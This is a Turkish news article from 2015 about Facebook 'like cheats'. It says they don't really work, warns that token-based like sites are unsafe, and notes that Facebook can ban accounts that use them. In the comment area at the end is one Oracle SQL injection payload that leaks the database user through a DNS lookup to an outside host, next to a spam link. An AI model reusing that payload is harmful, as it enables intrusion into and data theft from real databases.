Facebook Beğeni Hilesi

Facebook beğeni hilesi nasıl yapılır? Tam olarak beğeni hilesi nasıl yapılıyor? İşte cevapları..
09 Şubat 2015 17:03
Facebook Beğeni Hilesi
Facebook'ta her gün milyonlarca paylaşım yapılıyor ve herkes paylaştığı içerikleri beğendirmek için büyük çaba harcıyor. Peki, Facebook'taki paylaşımlarımızı arkadaşlarımıza beğendiremiyorsak, ne yapmalıyız?
 
Tabi ki konumuzun başlığında belirttiğimiz hile yaparak paylaşımlarımızı beğendirebiliriz. Peki, Facebook beğeni hilesi nasıl yapılıyor?
 
Facebook beğeni hilesi yapmak için ne gibi araçlara ihtiyacımız var? Facebook beğeni hilesi güvenli mi? gibi milyonlarca soru akıllarda dolanıyor. İsterseniz sizleri daha fazla bekletmeden sorularınızı cevaplayalım.
 
Nasıl yapılıyor?
Facebook beğeni hilesi için Facebook yardım topluluğunda yaptığımız araştırmalar ile Facebook beğeni hilesi hakkında önemli bilgiler elde ettik.
 
Aslında Facebook beğeni hilesi diye bir şeyin tam olarak var olmadığını söyleyebiliriz.
 
Facebook'ta istediğimiz kişilerin paylaşımlarımızı beğenmesini sağlamamız mümkün değil.
 
Güvenilir değil
Facebook beğeni hilesi için çeşitli sitelerde token yolu ile beğendirme yapmak mümkün. Ancak bu sitelere üye olmak güvenli olmadığı için önermiyoruz.
 
Ayrıca bu sitelerde yaptığınız beğendirme işlemleri sonucunda, sizde tanımadığınız kişilerin paylaşımlarını istemeden beğeniyorsunuz.
 
Daha açık söylemek gerekirse, bu tip sitelerde sisteme üye olanların tamamı, birbirinin paylaşımlarını beğenmeye zorlanıyor. Yani Facebook beğendirme hilesi güvenli olmadığı gibi kullanması mantıklı görünmeyen bir yöntem.
 
Hesabınız kapanabilir!
Ayrıca Facebook'ta, beğeni hilesi yapanları tespit ettiği takdirde hesapları banlayabiliyor ya da belirli bir süre boyunca dondurabiliyor.
 
Bu nedenle hesabınızın güvenliği için doğru olan, paylaşımlarınızın beğenilebilirliğini arkadaşlarınıza bırakmanız ve güzel içerikler paylaşmaya devam etmeniz olacaktır.
shiftdelete
804933
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
16 Ağustos 2017, Çarşamba 02:14
Facebook beğeni hilesi https://begenihilesi.com
Bu haberler ilginizi çekebilir